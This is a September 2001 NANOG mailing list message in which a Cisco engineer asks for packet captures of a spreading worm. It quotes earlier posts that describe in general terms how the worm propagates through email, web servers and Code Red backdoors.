[42608] in North American Network Operators' Group
Re: Worm probes.. Looking for captures.
daemon@ATHENA.MIT.EDU (Michael Airhart)
Tue Sep 18 13:10:28 2001
Message-Id: <4.3.2.7.2.20010918114802.01c65730@171.68.224.210>
Date: Tue, 18 Sep 2001 11:49:34 -0500
To: nanog@merit.edu
From: Michael Airhart <mairhart@cisco.com>
In-Reply-To: <20010918115439.A16468@roxanne.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Errors-To: owner-nanog-outgoing@merit.edu
Folks,
If anyone has a packet capture of the infection in progress, would you
please contact me. I would like to get it to the some of the Cisco IOS
folks ASAP. (Not my official job, but would like to help.)
Thanks!!
Michael Airhart
At 11:54 AM 9/18/2001 -0400, Eric Gauthier wrote:
> > Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
> > I've nailed a copy, and am working on getting it to the right security
> > people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates that
> > this one *both* sends itself via-email a la SirCam, *AND* scans for
> vulnerable
> > web servers, and if it finds a vulnerable server, it causes anybody
> visiting
> > that webpage to be offered a contaminated .exe as well.
> > I do *NOT* have a handle on what malicious effects it has other than just
> > propagating.
>
>I work at a large university and our security guys think this guy is what's
>been causing us problems all morning. Lots of subnet scans (tons of
>incomplete arps), CC Mail servers are wacking out, HPOV noting that
>old 3Com gear is dropping etc. This is what I've heard through the rumor
>mill (so take it with a grain of salt)...
>
>"...At first blush, it spreads itself via by web, email, and maybe shares.
>We've seen it spreading by a set of two HTTP requests. It will look for
>backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp
>to copy itself to the target machine then launches it via a second HTTP
>command."
>
>Eric :)
--------------------------------------------------------------------------------------------------------
Michael Airhart 512/378-1246 Office
Consulting Systems Engineer 413/480-1958 eFax
Cisco Systems, Inc. 800/365-4578 Pager
12515 Research Blvd mairhart@cisco.com
Austin, TX 78759
